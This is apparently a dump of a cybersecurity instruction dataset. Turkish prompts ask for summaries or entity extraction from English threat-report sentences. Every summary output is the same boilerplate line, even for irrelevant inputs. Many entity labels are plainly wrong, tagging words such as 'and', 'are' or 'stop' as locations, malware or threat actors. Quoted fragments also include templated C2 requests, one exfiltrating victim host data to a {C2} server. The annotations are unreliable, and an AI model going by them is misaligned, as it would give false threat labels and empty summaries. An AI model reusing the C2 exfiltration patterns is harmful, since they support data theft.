instruction
stringclasses
2 values
input
stringlengths
3
5.01k
output
stringlengths
10
5.79k
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Conclusion
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Absolute proof for a few of these hypotheses may never be realized.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Whatever the source, former CISA boss Chris Krebs warns that SMBs, education sector organizations, and state and local governments may be disproportionately affected as these often have fewer resources to spend on security.
attack-pattern: source; location: boss; location: and; location: and; location: may; location: security
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Based on the group’s Tor leak sites, DarkSide determines whether to pursue targeting a potential victim organization by primarily looking at that organization’s financial records.
malware: DarkSide
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
However, our analysis shows further similarities that imply correlation.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Once they've driven to the store.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
The malware will then delete the scheduled tasks added by the loader and add two new scheduled tasks that are listed in Table 1.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
The tools transferred using AnyDesk are: Netscan: To scan for other endpoints Nmap (log4shell.nse): To scan for Log4shell vulnerable endpoints Hacking tools Mimikatz and Impacket: For lateral movement PDQ deploy: For mass deployment of malicious script to multiple endpoints Aswarpot.sys: For disabling defense solutions.
tools: AnyDesk; tools: Mimikatz; attack-pattern: disabling defense solutions; tools: Nmap; FILEPATH: log4shell.nse; tools: Impacket; tools: Netscan; vulnerability: Log4shell; FILEPATH: Aswarpot.sys; attack-pattern: lateral movement; attack-pattern: mass deployment of malicious script; tools: PDQ deploy; tools: Aswarpot; attack-pattern: scan
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
An example of a spear-phishing email sent by Earth Wendigo to a democracy activist.
location: spear; attack-pattern: phishing
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Figure 4.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Because Google actively detects and disrupts phishing links sent via Gmail, the actors were observed driving targets to messaging apps like WhatsApp, Telegram or Discord.
location: and; attack-pattern: phishing
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
As ZDI predicted, 2021 continued to be a busy year.
identity: ZDI; TIME: 2021
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Spear phishing, like the name implies, is a more targeted form of phishing which incorporates a theme directly related to the target.
attack-pattern: Spear phishing; attack-pattern: phishing; location: target
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Now, over four months since the Heartbleed disclosure, this attack reminds us of how serious this vulnerability is and how critical protection against it remains.
vulnerability: Heartbleed
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Speaking of data exfil, in the first half we saw APT actors utilize cloud-based file storage to exfiltrate their stolen data.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
According to the Apache HTTP Server webpage, from 2012 to 2016 there were a total of 31 vulnerabilities found in the Apache HTTP Server.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
To add resilience to their infrastructure, the operators have also implemented a backup mechanism using the Bitcoin blockchain.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
From Google: “Android Open Source Project includes patches for this issue for Android 4.3 and later.
attack-pattern: Source; location: issue; location: and
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
The watering hole served an XNU privilege escalation vulnerability (CVE-2021-30869) unpatched in macOS Catalina, which led to the installation of a previously unreported backdoor.
location: hole; attack-pattern: privilege escalation
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Based on their pdb strings, they’re both components of another REDBALDKNIGHT-related threat, XXMM (TROJ_KVNDM), a downloader Trojan that can also act as a first-stage backdoor with its capability to open a shell.
threat-actor: REDBALDKNIGHT; malware: XXMM; location: can; location: shell
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
GeckoHtmlElement > (
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
The following code demonstrates how you can decrypt the malware communications using Python: The malware then enters a loop where it will send out periodic requests to the remote server.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Note that while the technical implementation may not expose said functionality as a normal library, such exposure is not necessary for the types of analysis performed here.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
RATANKBA host manipulation console RATANKBA’s controllers use the “Nimo Software HTTP Retriever 1.0” user-agent string for its communication.
malware: RATANKBA; location: host; malware: RATANKBA
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
They are really susceptible to those end caps and impulse buys... and then they're going to leave.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Our products are designed with robust built-in security features, like Gmail protections against phishing and Safe Browsing in Chrome, but we still dedicate significant resources to developing new tools and technology to help identify, track and stop this kind of activity.
location: are; location: security; attack-pattern: phishing; location: and; threat-actor: Safe; location: and; location: and; location: stop
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
At least one message was sent to a diplomat based in the island of Saint Martin after Hurricane Irma hit.
location: diplomat; location: island; identity: hit
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
For example, LockBit 2.0 leverages Tox Chat for threat actor communications.
malware: LockBit 2.0; tools: Tox Chat
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
They also perpetrated social engineering attacks to phish credentials or prompt the download of a remote access tool.
attack-pattern: social engineering attacks
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
This will also help you identify the coin mining “insider threat,” as misguided administrators may see their organizations’ unused CPU time as a way to generate personal income.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Since our last update, TAG has observed a continuously growing number of threat actors using the war as a lure in phishing and malware campaigns.
identity: TAG; attack-pattern: lure in phishing
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
All staff — from the CEO to rank-and-file employees — must learn about the different kinds of scams and what to do in case of any encounters (i.e., double-check with others and verify email details).
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Product Name
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
The initial delivery mechanism of BIOPASS RAT uses of a watering hole, a compromised website in which the malicious actors inject their custom JavaScript code to deliver malware.
attack-pattern: watering hole; malware: BIOPASS RAT
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
This further visibility equips organizations with actionable threat intelligence, context, and insights that can be used to delve deeper into an attack — which security gaps are exploited, if the attack has multiple payloads, or if the malware has already spread within the network.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
On the right, the legitimate document from CSBA.
identity: CSBA
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Figure 6.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Additionally, network devices, embedded systems and Internet-connected devices (like IP Cameras) often run Linux and could be vulnerable.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
GET http://{C2}/Index.php?vubc={identity} HTTP/1.1
URL: http://{C2}/Index.php?vubc={identity
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Furthermore, 3.5M users were warned before downloading a malicious file through Google Safe Browsing warnings.
SOFTWARE: Google Safe Browsing
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Cloud investments are delivering innovative customer experiences, streamlining business processes and driving enterprise agility across the planet.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
To steal these, both groups employed credential dumping and input capture.
attack-pattern: credential dumping; attack-pattern: input capture
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
We believe this is a technique the attacker is using to evade detection rules.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Figure 3: Hancitor distribution servers globally thus far in 2017 Table 1 – Number of Distribution Servers by Country
malware: Hancitor; TIME: 2017
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
According to ESET, the initial infection vector for Bad Rabbit is through a fake Adobe Flash update that is offered up from compromised websites.
malware: Bad Rabbit; identity: ESET; SOFTWARE: Adobe Flash
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
infuses high-fidelity machine learning with other detection technologies and global threat intelligence for comprehensive protection against all kinds of threats.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
POST http://{C2}/?Key={GUID}&Crc={Identifier} { "appName": "Gmail Downloader", "targetname": "{Email}", "HostName": "REDACTED", "srcUserIP": "REDACTED", "actionType": "First", "timeOccurrence": "05/01/2022 05:50:31 PM", "OS": "REDACTED", "OSVersion": "REDACTED", "SystemModel": "REDACTED", "SystemType": "REDACTED", "srcName": "REDACTED", "srcOrgName": "REDACTED" }
location: POST; URL: http://{C2}/?Key={GUID}&Crc={Identifier; TIME: 05:50:31 PM
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
To illustrate the simplicity of the malware in Pawn Storm’s recent spear-phishing attacks, we describe one example below:
location: spear; attack-pattern: phishing; location: one
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
We terminated 123 YouTube channels as part of our investigation into coordinated influence operations linked to Russia.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Updated June 3, 2022, at 3:30 p.m. PT.
TIME: June 3, 2022, at 3:30 p.m. PT
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
And we don’t just plug security holes – we work to eliminate entire classes of threats for consumers and businesses whose work depends on the Internet.
location: And; identity: just; location: security; location: and
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
August 2020: DarkSide introduces its ransomware.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Threat actors are always looking to expand the strategies they use, thus security practices and solutions that work for less organized cybercriminals might not work for determined groups who are willing to spend time, resources and manpower to accomplish their goals.
location: are; malware: expand; location: security; location: and; location: are; location: time; location: and
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
StealBit contains the following capabilities:
malware: StealBit
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Two of the initial set of samples identified create a unique mutex containing the following message:
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
For source verification and authentication, it uses Sender Policy Framework (SPF), DomainKeys Identified Mail (DKIM), and Domain-Based Message Authentication, Reporting and Conformance (DMARC).
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
We believe there was no major impact on Android users and that the number of installs was miniscule.
SOFTWARE: Android
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Another important consideration for attribution is that we have some historical background for Operation Earth Kitsune.
campaign: Operation Earth Kitsune
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Because the Spring Framework is widely used for web system development and the severity of the vulnerability is critical (CVSS score of 9.8), CVE-2022-22965 is given the name SpringShell (and/or Spring4Shell) by the infosec community.
vulnerability: CVE-2022-22965; vulnerability: SpringShell; SOFTWARE: Spring Framework; vulnerability: Spring4Shell
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
This included the soon-to-be de rigueur data exfiltration and deletion technique, and also redirection of some DNS records.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
The TA505 group usually attaches a malicious file without any compression.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Again, this threat actor’s interest in military personnel is obvious.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
If the cookies failed to provide access to the account, a login page is displayed and the attacker can manually enter credentials to proceed, as the program will wait until it finds the inbox page.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
TAG has also continued to observe multiple ransomware brokers continuing to operate in a business as usual sense.
identity: TAG
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
This is a subset of our current Courses of Action initiative and will be updated as the project progresses.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
The attackers use this function to relay device-based data to the channel, so they can see details such as the IP, useragent, and locales of visitors to their phishing sites in real-time.
location: can; location: and; attack-pattern: phishing; location: sites; location: real; location: time
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Initial Access
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Once installed (i.e. implanted on a system), the modern backdoor typically offers much more than simple (i.e. command line) access to a system.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Pawn Storm’s modus operandi is quite consistent over the years, with some of their technical tricks being used repeatedly.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
AES encryption code Figure 8.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
In lieu of these exploits, let’s take a look at how Trend Micro Vision One™ and Trend Micro Cloud One™ can provide protection against two of the four zero-days, CVE-2021-26855 and CVE-2021-27065.
SOFTWARE: Trend Micro Vision One™; SOFTWARE: Trend Micro Cloud One™; vulnerability: CVE-2021-26855; vulnerability: CVE-2021-27065
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
A primary reason for the popularity of SMS-based IAP is that it does not require Internet connectivity, just cell service.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Kill: Posts a job to kill the backdoor inject Posts a job for DLL injection Interval Changes the sleep interval Cmd
location: job; location: job; malware: Cmd
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Using these as our guide, we can make sense of where we are today, how we got here, and be prepared for what has yet to develop in the future.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
We found that the BIOPASS RAT has the ability to open an HTTP service running on localhost on a port chosen from a hard-coded list.
malware: BIOPASS RAT
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
The following commands are supported: Once again, using the previous example, the malware will first ensure that the command was not previously parsed/executed.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Disable or secure the use of system administration tools such as PowerShell and other command-line tools that may be abused.
attack-pattern: PowerShell; location: and; location: may
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Figure 2.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Terminate process Terminates the specified process if currently running on an endpoint Isolate endpoint Blocks all network activity on an endpoint while the system is being investigated
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
theme0.xml is extracted to /tmp/system/word/theme/syslogd before it’s executed.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
When this process completes, the malware displays an ASCII Ransom note demanding payment from the victim (Figure 1). Figure 1: Latest Petya Ransom note displayed on a compromised system.
malware: Petya
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Carbanak also performs brute force tactics or takes advantage of credentials that are saved in web browsers.
attack-pattern: brute force
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
ERROR: type should be string, got " https://github.com/hfiref0x/Stryker"
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
The subdomains of their phishing sites were configured to match the names of the targets’ domain, such as “{victim’s domain}[.]basic-authentication[.]live”.
URL: {victim’s domain}[.]basic-authentication[.]live
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
The following are samples using this evasion: https://www.virustotal.com/gui/file/5094028a0afb4d4a3d8fa82b613c0e59d31450d6c75ed96ded02be1e9db8104f/detection New variant: https://www.virustotal.com/gui/file/5c0ff7b23457078c9d0cbe186f1d05bfd573eb555baa1bf4a45e1b79c8c575db/detection
location: are; SHA1: https://www.virustotal.com/gui/file/5094028a0afb4d4a3d8fa82b613c0e59d31450d6c75ed96ded02be1e9db8104f/detection; URL: https://www.virustotal.com/gui/file/5c0ff7b23457078c9d0cbe186f1d05bfd573eb555baa1bf4a45e1b79c8c575db/detection
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Figure 14.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
The actors behind this campaign, which we attribute to a group of hackers recruited in a Russian-speaking forum, lure their target with fake collaboration opportunities (typically a demo for anti-virus software, VPN, music players, photo editing or online games), hijack their channel, then either sell it to the highest bidder or use it to broadcast cryptocurrency scams.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Although the applications were never available in Google Play, we have notified the Android users of infected devices and implemented changes in Google Play Protect to protect all users. Android Implant This analysis is based on fe95855691cada4493641bc4f01eb00c670c002166d6591fe38073dd0ea1d001 that was uploaded to VirusTotal on May 27.
location: and; SHA1: fe95855691cada4493641bc4f01eb00c670c002166d6591fe38073dd0ea1d001
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Why should I care, what can it do to me?
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
AutoFocus users view samples using the Petya tag.
malware: Petya
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Having a distributed infrastructure also makes it more difficult for cybersecurity teams to take down the whole attack.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
It can, in turn, prolong the campaign’s foothold in the system and enable attackers to carry out further lateral movement.
attack-pattern: lateral movement
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
One notable campaign attempted to target personal accounts of U.S. government employees with phishing lures using American fast food franchises and COVID-19 messaging.
location: campaign; location: target; attack-pattern: phishing; location: and
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
We have also taken extraordinary measures beyond our actions against coordinated influence operations to protect users and stop the spread of misinformation and disinformation about the war in Ukraine online.
location: and; malware: stop; location: and; location: war
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
This code is typically designed to stay hidden, under the radar of the company.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Further complicating the issue is the growing scope and scale of attacks today that are successfully targeting the seams between these layers.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Components of the file and routine appear similar to those of a published entry, while our sample executed .x15cache, the bash script that downloads the malware. Figure 1. Targeted machine using brute force via SSH The shell script downloads, extracts, and executes the miner payload.
location: and; location: sample; attack-pattern: brute force; location: shell; location: and; location: miner
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Network traffic analysis, deployment of firewalls and intrusion detection and prevention systems, network segmentation, and data categorization are just some of them.
location: and; location: and; location: and; location: are; identity: just; location: them
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
However, the network bandwidth in embedded systems is also lower than, for example, what internet nodes can provide.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.